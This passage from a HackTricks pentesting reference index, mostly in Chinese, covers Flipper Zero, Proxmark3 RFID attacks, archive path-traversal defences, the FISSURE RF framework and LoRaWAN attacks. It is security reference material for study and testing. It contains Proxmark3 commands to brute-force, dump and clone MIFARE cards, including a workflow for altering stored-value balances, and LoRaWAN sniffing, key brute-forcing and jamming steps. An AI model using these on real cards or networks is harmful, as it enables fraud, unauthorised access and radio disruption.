Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Reference","id":"10392","title":"Reference"},"10393":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » FZ - Infrared","id":"10393","title":"FZ - Infrared"},"10394":{"body":"有关红外线工作原理的更多信息,请查看: Infrared","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » Intro","id":"10394","title":"Intro"},"10395":{"body":"Flipper使用数字IR信号接收器TSOP,这 允许拦截来自IR遥控器的信号 。有一些 智能手机 如小米,也有IR端口,但请记住, 大多数只能发送 信号, 无法接收 信号。 Flipper的红外线 接收器相当敏感 。您甚至可以在 遥控器和电视之间的某个地方 捕捉到信号。将遥控器直接指向Flipper的IR端口并不是必要的。这在某人站在电视附近切换频道时非常方便,而您和Flipper都在一定距离之外。 由于 红外线信号的解码 发生在 软件 端,Flipper Zero潜在地支持 接收和发送任何IR遥控代码 。在无法识别的 未知 协议的情况下,它 记录并回放 接收到的原始信号。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » IR Signal Receiver in Flipper Zero","id":"10395","title":"IR Signal Receiver in Flipper Zero"},"10396":{"body":"","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » Actions","id":"10396","title":"Actions"},"10397":{"body":"Flipper Zero可以用作 通用遥控器来控制任何电视、空调或媒体中心 。在此模式下,Flipper会 暴力破解 所有支持制造商的 已知代码 , 根据SD卡中的字典 。您无需选择特定的遥控器来关闭餐厅的电视。 只需在通用遥控模式下按下电源按钮,Flipper将**依次发送所有已知电视的“关机”**命令:索尼、三星、松下……等等。当电视接收到信号时,它将做出反应并关闭。 这种暴力破解需要时间。字典越大,完成所需的时间就越长。无法确定电视确切识别了哪个信号,因为电视没有反馈。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » Universal Remotes","id":"10397","title":"Universal Remotes"},"10398":{"body":"可以使用Flipper Zero 捕获红外信号 。如果它 在数据库中找到信号 ,Flipper将自动 知道这是哪个设备 并允许您与之交互。 如果没有,Flipper可以 存储 该 信号 并允许您 重播 它。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » Learn New Remote","id":"10398","title":"Learn New Remote"},"10399":{"body":"https://blog.flipperzero.one/infrared/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » References","id":"10399","title":"References"},"104":{"body":"一旦你发现了所有想要深入扫描的 IP(外部或内部),可以执行不同的操作。","breadcrumbs":"Pentesting Network » 扫描主机","id":"104","title":"扫描主机"},"1040":{"body":"静态检查 – 列出归档条目,并标记任何包含 ../、..\\\\\\\\、 绝对路径 (C:) 或非规范 UTF-8/UTF-16 编码的名称。 沙箱提取 – 使用 安全 提取器(例如,Python 的 patool、7-Zip ≥ 最新版、bsdtar)解压到一次性目录,并验证结果路径保持在该目录内。 端点监控 – 在 WinRAR/7-Zip 等打开归档后,警报新可执行文件写入 Startup/Run 位置。","breadcrumbs":"Archive Extraction Path Traversal » 检测提示","id":"1040","title":"检测提示"},"10400":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » FZ - iButton","id":"10400","title":"FZ - iButton"},"10401":{"body":"有关 iButton 的更多信息,请查看: iButton","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Intro","id":"10401","title":"Intro"},"10402":{"body":"下图的 蓝色 部分是您需要 放置真实 iButton 的位置,以便 Flipper 可以 读取它。 绿色 部分是您需要 用 Flipper zero 接触读卡器 以 正确模拟 iButton 的方式。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Design","id":"10402","title":"Design"},"10403":{"body":"","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Actions","id":"10403","title":"Actions"},"10404":{"body":"在读取模式下,Flipper 正在等待 iButton 密钥接触,并能够处理三种类型的密钥: Dallas, Cyfral, 和 Metakom 。Flipper 将 自动识别密钥类型 。密钥协议的名称将显示在 ID 号码上方的屏幕上。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Read","id":"10404","title":"Read"},"10405":{"body":"可以 手动添加 类型为: Dallas, Cyfral, 和 Metakom 的 iButton。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Add manually","id":"10405","title":"Add manually"},"10406":{"body":"可以 模拟 已保存的 iButtons(读取或手动添加)。 tip 如果您无法使 Flipper Zero 的预期接触点接触读卡器,您可以 使用外部 GPIO:","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Emulate","id":"10406","title":"Emulate"},"10407":{"body":"https://blog.flipperzero.one/taming-ibutton/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » References","id":"10407","title":"References"},"10408":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » FZ - 125kHz RFID","id":"10408","title":"FZ - 125kHz RFID"},"10409":{"body":"有关125kHz标签工作原理的更多信息,请查看: Pentesting RFID","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » Intro","id":"10409","title":"Intro"},"1041":{"body":"更新提取器 – WinRAR 7.13 实现了适当的路径清理。用户必须手动下载,因为 WinRAR 缺乏自动更新机制。 尽可能使用 “忽略路径” 选项提取归档(WinRAR: 提取 → \\"不提取路径\\" )。 在 沙箱 或虚拟机中打开不受信任的归档。 实施应用程序白名单,并限制用户对自动运行目录的写入访问。","breadcrumbs":"Archive Extraction Path Traversal » 缓解与加固","id":"1041","title":"缓解与加固"},"10410":{"body":"有关这些类型标签的更多信息 请阅读此介绍 。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » Actions","id":"10410","title":"Actions"},"10411":{"body":"尝试 读取 卡片信息。然后可以 模拟 它们。 warning 请注意,一些对讲机试图通过在读取之前发送写入命令来保护自己免受密钥复制。如果写入成功,则该标签被视为假标签。当Flipper模拟RFID时,读卡器无法将其与原始标签区分开,因此不会出现此类问题。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » Read","id":"10411","title":"Read"},"10412":{"body":"您可以在Flipper Zero中创建 指示您手动输入数据的假卡 ,然后模拟它。 IDs on cards 有时,当您获得一张卡时,您会发现卡片上可见的ID(或部分ID)。 EM Marin 例如,在这张EM-Marin卡中,物理卡上可以 清晰地读取最后3个字节中的5个字节 。 如果您无法从卡片上读取其他2个字节,可以通过暴力破解来获取。 HID 在这张HID卡中也是如此,只有3个字节中的2个可以在卡片上找到。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » Add Manually","id":"10412","title":"Add Manually"},"10413":{"body":"在 复制 一张卡或 手动输入 ID后,可以使用Flipper Zero 模拟 它或 写入 到真实卡片中。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » Emulate/Write","id":"10413","title":"Emulate/Write"},"10414":{"body":"https://blog.flipperzero.one/rfid/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » References","id":"10414","title":"References"},"10415":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Proxmark 3 » Proxmark 3","id":"10415","title":"Proxmark 3"},"10416":{"body":"The first thing you need to do is to have a Proxmark3 and install the software and it\'s dependencie s .","breadcrumbs":"Radio Hacking » Proxmark 3 » 使用 Proxmark3 攻击 RFID 系统","id":"10416","title":"使用 Proxmark3 攻击 RFID 系统"},"10417":{"body":"它有 16 sectors ,每个有 4 blocks ,每个 block 包含 16B 。UID 位于 sector 0 block 0(且不能被更改)。 要访问每个 sector 你需要 2 keys ( A 和 B ),它们存储在 block 3 of each sector (sector trailer)。sector trailer 还存储 access bits ,这些位决定了使用这两个 keys 对 each block 的 read and write 权限。 2 keys 可用于例如:如果你知道第一个则可以赋予读取权限,如果你知道第二个则可以赋予写入权限(例如)。 Several attacks can be performed bash proxmark3> hf mf #List attacks proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce\\nproxmark3> hf mf fchk 1 t # Improved keys BF proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key\\nproxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)\\nproxmark3> hf mf restore # Copy data to a new card\\nproxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump\\nproxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1\\nproxmark3> hf mf eget 01 # Read block 1\\nproxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card The Proxmark3 allows to perform other actions like eavesdropping a Tag to Reader communication to try to find sensitive data. In this card you could just sniff the communication with and calculate the used key because the cryptographic operations used are weak and knowing the plain and cipher text you can calculate it (mfkey64 tool). MiFare Classic quick workflow for stored-value abuse 当终端在 Classic 卡上存储余额时,典型的端到端流程是: bash # 1) Recover sector keys and dump full card\\nproxmark3> hf mf autopwn # 2) Modify dump offline (adjust balance + integrity bytes)\\n# Use diffing of before/after top-up dumps to locate fields # 3) Write modified dump to a UID-changeable (\\"Chinese magic\\") tag\\nproxmark3> hf mf cload -f modified.bin # 4) Clone original UID so readers recognize the card\\nproxmark3> hf mf csetuid -u 注意 hf mf autopwn 协调 nested/darkside/HardNested-style 攻击,恢复密钥,并在 client dumps 文件夹中创建 dumps。 写入 block 0/UID 仅适用于 magic gen1a/gen2 cards。普通 Classic cards 的 UID 为只读。 许多部署使用 Classic \\"value blocks\\" 或简单的 checksums。编辑后请确保所有 duplicated/complemented fields 和 checksums 保持一致。 参见更高层次的方法论和缓解措施: Pentesting RFID","breadcrumbs":"Radio Hacking » Proxmark 3 » 针对 MIFARE Classic 1KB 的攻击","id":"10417","title":"针对 MIFARE Classic 1KB 的攻击"},"10418":{"body":"IoT 系统有时使用 nonbranded or noncommercial tags 。在这种情况下,你可以使用 Proxmark3 向它们发送自定义 raw commands to the tags 。 bash proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04\\nSAK : 08 [2]\\nTYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1\\nproprietary non iso14443-4 card found, RATS not supported\\nNo chinese magic backdoor command detected\\nPrng detection: WEAK\\nValid ISO14443A Tag Found - Quiting Search 有了这些信息,你可以尝试搜索有关该卡以及与其通信方式的信息。Proxmark3 允许发送原始命令,例如:hf 14a raw -p -b 7 26","breadcrumbs":"Radio Hacking » Proxmark 3 » 原始命令","id":"10418","title":"原始命令"},"10419":{"body":"Proxmark3 软件附带了预加载的 自动化脚本 列表,可用于执行简单任务。要检索完整列表,请使用 script list 命令。接着使用 script run 命令,后面跟上脚本名称: proxmark3> script run mfkeys 你可以创建一个脚本来 fuzz tag readers ,在复制一个 valid card 的数据时,只需编写一个 Lua script 对一个或多个随机 bytes 进行 randomize ,并检查在任意一次迭代中是否会 reader crashes 。","breadcrumbs":"Radio Hacking » Proxmark 3 » 脚本","id":"10419","title":"脚本"},"1042":{"body":"2018 – Snyk 发布的大规模 Zip-Slip 通告,影响许多 Java/Go/JS 库。 2023 – 7-Zip CVE-2023-4011 在 -ao 合并期间类似的遍历。 任何未能在写入之前调用 PathCanonicalize / realpath 的自定义提取逻辑。","breadcrumbs":"Archive Extraction Path Traversal » 其他受影响/历史案例","id":"1042","title":"其他受影响/历史案例"},"10420":{"body":"Proxmark3 wiki: HF MIFARE Proxmark3 wiki: HF Magic cards NXP statement on MIFARE Classic Crypto1 NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Proxmark 3 » 参考资料","id":"10420","title":"参考资料"},"10421":{"body":"Reading time: 12 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 频率独立的基于SDR的信号理解和逆向工程 FISSURE是一个开源的RF和逆向工程框架,旨在适合所有技能水平,具有信号检测和分类、协议发现、攻击执行、IQ操控、漏洞分析、自动化和AI/ML的钩子。该框架旨在促进软件模块、无线电、协议、信号数据、脚本、流程图、参考材料和第三方工具的快速集成。FISSURE是一个工作流启用器,将软件集中在一个位置,使团队能够轻松跟上进度,同时共享特定Linux发行版的相同经过验证的基线配置。 FISSURE包含的框架和工具旨在检测RF能量的存在,理解信号的特性,收集和分析样本,开发传输和/或注入技术,并制作自定义有效载荷或消息。FISSURE包含一个不断增长的协议和信号信息库,以协助识别、数据包制作和模糊测试。在线档案功能可以下载信号文件并构建播放列表以模拟流量和测试系统。 友好的Python代码库和用户界面使初学者能够快速了解涉及RF和逆向工程的流行工具和技术。网络安全和工程领域的教育工作者可以利用内置材料或利用该框架展示他们自己的实际应用。开发人员和研究人员可以将FISSURE用于日常任务或向更广泛的受众展示他们的前沿解决方案。随着FISSURE在社区中的认知和使用的增长,其能力和所涵盖技术的广度也将随之增加。 附加信息 AIS Page GRCon22 Slides GRCon22 Paper GRCon22 Video Hack Chat Transcript","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » FISSURE - The RF Framework","id":"10421","title":"FISSURE - The RF Framework"},"10422":{"body":"支持的 FISSURE中有三个分支,以便于文件导航并减少代码冗余。Python2_maint-3.7分支包含围绕Python2、PyQt4和GNU Radio 3.7构建的代码库;Python3_maint-3.8分支围绕Python3、PyQt5和GNU Radio 3.8构建;Python3_maint-3.10分支围绕Python3、PyQt5和GNU Radio 3.10构建。 操作系统 FISSURE分支 Ubuntu 18.04 (x64) Python2_maint-3.7 Ubuntu 18.04.5 (x64) Python2_maint-3.7 Ubuntu 18.04.6 (x64) Python2_maint-3.7 Ubuntu 20.04.1 (x64) Python3_maint-3.8 Ubuntu 20.04.4 (x64) Python3_maint-3.8 KDE neon 5.25 (x64) Python3_maint-3.8 进行中(测试版) 这些操作系统仍处于测试状态。它们正在开发中,已知缺少多个功能。安装程序中的项目可能与现有程序冲突或在状态被移除之前无法安装。 操作系统 FISSURE分支 DragonOS Focal (x86_64) Python3_maint-3.8 Ubuntu 22.04 (x64) Python3_maint-3.10 注意:某些软件工具并不适用于每个操作系统。请参阅 Software And Conflicts 安装 git clone https://github.com/ainfosec/FISSURE.git\\ncd FISSURE\\ngit checkout or or \\ngit submodule update --init\\n./install 这将安装启动安装 GUI 所需的 PyQt 软件依赖项(如果未找到)。 接下来,选择最符合您操作系统的选项(如果您的操作系统与选项匹配,则应自动检测)。 Python2_maint-3.7 Python3_maint-3.8 Python3_maint-3.10 install1b install1a install1c 建议在干净的操作系统上安装 FISSURE,以避免现有的冲突。选择所有推荐的复选框(默认按钮),以避免在操作 FISSURE 内的各种工具时出现错误。安装过程中会有多个提示,主要询问提升权限和用户名。如果某个项目在末尾包含“验证”部分,安装程序将运行后面的命令,并根据命令是否产生错误将复选框项目高亮显示为绿色或红色。没有“验证”部分的已选项目在安装后将保持黑色。 install2 使用方法 打开终端并输入: fissure 参考FISSURE帮助菜单以获取更多使用细节。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 开始使用","id":"10422","title":"开始使用"},"10423":{"body":"组件 仪表板 中心枢纽 (HIPRFISR) 目标信号识别 (TSI) 协议发现 (PD) 流图与脚本执行器 (FGE) components 功能 信号检测器 IQ操控 信号查找 模式识别 攻击 模糊测试 信号播放列表 图像库 数据包构造 Scapy集成 CRC计算器 日志记录 硬件 以下是具有不同集成级别的“支持”硬件列表: USRP: X3xx, B2xx, B20xmini, USRP2, N2xx HackRF RTL2832U 802.11适配器 LimeSDR bladeRF, bladeRF 2.0 micro Open Sniffer PlutoSDR","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 详细信息","id":"10423","title":"详细信息"},"10424":{"body":"FISSURE附带了几本有用的指南,以帮助熟悉不同的技术和技巧。许多指南包括使用集成到FISSURE中的各种工具的步骤。 Lesson1: OpenBTS Lesson2: Lua Dissectors Lesson3: Sound eXchange Lesson4: ESP Boards Lesson5: Radiosonde Tracking Lesson6: RFID Lesson7: Data Types Lesson8: Custom GNU Radio Blocks Lesson9: TPMS Lesson10: Ham Radio Exams Lesson11: Wi-Fi Tools","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 课程","id":"10424","title":"课程"},"10425":{"body":"添加更多硬件类型、RF协议、信号参数、分析工具 支持更多操作系统 开发围绕FISSURE的课程材料(RF攻击、Wi-Fi、GNU Radio、PyQt等) 创建信号调节器、特征提取器和信号分类器,支持可选择的AI/ML技术 实现递归解调机制,以从未知信号生成比特流 将主要FISSURE组件过渡到通用传感器节点部署方案","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 路线图","id":"10425","title":"路线图"},"10426":{"body":"强烈鼓励对FISSURE的改进建议。如果您对以下内容有任何想法,请在 讨论 页面或Discord服务器上留言: 新功能建议和设计变更 带有安装步骤的软件工具 新课程或现有课程的附加材料 感兴趣的RF协议 更多硬件和SDR类型以供集成 Python中的IQ分析脚本 安装修正和改进 对FISSURE的贡献对于加速其开发至关重要。您所做的任何贡献都将受到高度赞赏。如果您希望通过代码开发进行贡献,请先fork该仓库并创建一个pull request: Fork项目 创建您的功能分支(git checkout -b feature/AmazingFeature) 提交您的更改(git commit -m \'Add some AmazingFeature\') 推送到分支(git push origin feature/AmazingFeature) 打开一个pull request 创建 问题 以引起对错误的关注也是受欢迎的。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 贡献","id":"10426","title":"贡献"},"10427":{"body":"联系Assured Information Security, Inc. (AIS)商业发展部门,提出并正式化任何FISSURE合作机会——无论是通过投入时间集成您的软件,还是让AIS的优秀人才为您的技术挑战开发解决方案,或将FISSURE集成到其他平台/应用程序中。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 合作","id":"10427","title":"合作"},"10428":{"body":"GPL-3.0 有关许可证的详细信息,请参见LICENSE文件。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 许可证","id":"10428","title":"许可证"},"10429":{"body":"加入Discord服务器: https://discord.gg/JZDs5sgxcG 在Twitter上关注: @FissureRF , @AinfoSec Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com 商业发展 - Assured Information Security, Inc. - bd@ainfosec.com","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 联系","id":"10429","title":"联系"},"1043":{"body":"BleepingComputer – WinRAR 零日漏洞被利用在归档提取中植入恶意软件 WinRAR 7.13 更新日志 Snyk – Zip Slip 漏洞分析 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Archive Extraction Path Traversal » 参考文献","id":"1043","title":"参考文献"},"10430":{"body":"我们感谢这些开发者: Credits","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 贡献者","id":"10430","title":"贡献者"},"10431":{"body":"特别感谢Dr. Samuel Mantravadi和Joseph Reith对本项目的贡献。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » FISSURE - The RF Framework » 致谢","id":"10431","title":"致谢"},"10432":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 低功耗广域网","id":"10432","title":"低功耗广域网"},"10433":{"body":"低功耗广域网 (LPWAN) 是一组无线、低功耗、广域网技术,旨在实现 长距离通信 ,并具有低比特率。 它们的通信范围可超过 六英里 ,其 电池 寿命可达 20年 。 长距离 ( LoRa ) 目前是部署最广泛的 LPWAN 物理层,其开放的 MAC 层规范是 LoRaWAN 。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 介绍","id":"10433","title":"介绍"},"10434":{"body":"LoRa – 由 Semtech 开发的啁啾扩频 (CSS) 物理层(专有但有文档)。 LoRaWAN – 由 LoRa-Alliance 维护的开放 MAC/网络层。版本 1.0.x 和 1.1 在实际应用中较为常见。 典型架构: 终端设备 → 网关(数据包转发器) → 网络服务器 → 应用服务器 。 安全模型 依赖于两个 AES-128 根密钥 (AppKey/NwkKey),在 加入 过程中(OTAA)派生会话密钥,或是硬编码(ABP)。如果任何密钥泄露,攻击者将获得对相应流量的完全读/写能力。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » LPWAN、LoRa 和 LoRaWAN","id":"10434","title":"LPWAN、LoRa 和 LoRaWAN"},"10435":{"body":"层级 弱点 实际影响 PHY 反应性/选择性干扰 使用单个 SDR 和 <1 W 输出演示 100% 数据包丢失 MAC 加入接受和数据帧重放(随机数重用,ABP 计数器回滚) 设备欺骗、消息注入、拒绝服务 网络服务器 不安全的数据包转发器、弱 MQTT/UDP 过滤器、过时的网关固件 网关上的 RCE → 进入 OT/IT 网络 应用 硬编码或可预测的 AppKeys 暴力破解/解密流量,冒充传感器","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 攻击面总结","id":"10435","title":"攻击面总结"},"10436":{"body":"CVE-2024-29862 – ChirpStack gateway-bridge 和 mqtt-forwarder 接受绕过有状态防火墙规则的 TCP 数据包,导致远程管理接口暴露。分别在 4.0.11 / 4.2.1 中修复。 Dragino LG01/LG308 系列 – 多个 2022-2024 CVE(例如 2022-45227 目录遍历,2022-45228 CSRF)在 2025 年仍未修补;在数千个公共网关上启用未经身份验证的固件转储或配置覆盖。 Semtech 数据包转发器 UDP 溢出(未发布的建议,2023-10 修补):构造的上行数据包大于 255 B 触发堆栈溢出 -> 在 SX130x 参考网关上 RCE(由 Black Hat EU 2023 “LoRa Exploitation Reloaded” 发现)。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 最近的漏洞 (2023-2025)","id":"10436","title":"最近的漏洞 (2023-2025)"},"10437":{"body":"","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 实用攻击技术","id":"10437","title":"实用攻击技术"},"10438":{"body":"bash # Capture all channels around 868.3 MHz with an SDR (USRP B205)\\npython3 lorattack/sniffer.py \\\\\\n--freq 868.3e6 --bw 125e3 --rate 1e6 --sf 7 --session smartcity # Bruteforce AppKey from captured OTAA join-request/accept pairs\\npython3 lorapwn/bruteforce_join.py --pcap smartcity.pcap --wordlist top1m.txt","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 1. 嗅探和解密流量","id":"10438","title":"1. 嗅探和解密流量"},"10439":{"body":"捕获一个合法的 JoinRequest 。 在原始设备再次传输之前立即重新传输它(或增加 RSSI)。 网络服务器分配一个新的 DevAddr 和会话密钥,而目标设备继续使用旧会话 → 攻击者拥有空闲会话并可以注入伪造的上行链路。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 2. OTAA 加入重放 (DevNonce 重用)","id":"10439","title":"2. OTAA 加入重放 (DevNonce 重用)"},"1044":{"body":"Reading time: 26 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Brute Force - CheatSheet » Brute Force - CheatSheet","id":"1044","title":"Brute Force - CheatSheet"},"10440":{"body":"强制 SF12/125 kHz 以增加空中时间 → 耗尽网关的占空比(拒绝服务),同时对攻击者的电池影响较小(仅发送网络级 MAC 命令)。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 3. 自适应数据速率 (ADR) 降级","id":"10440","title":"3. 自适应数据速率 (ADR) 降级"},"10441":{"body":"运行 GNU Radio 流图的 HackRF One 在检测到前导码时触发宽带啁啾 - 阻塞所有扩频因子,发射功率 ≤200 mW;在 2 公里范围内测量到完全中断。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 4. 反应性干扰","id":"10441","title":"4. 反应性干扰"},"10442":{"body":"工具 目的 备注 LoRaWAN 审计框架 (LAF) 构造/解析/攻击 LoRaWAN 帧,基于数据库的分析器,暴力破解 Docker 镜像,支持 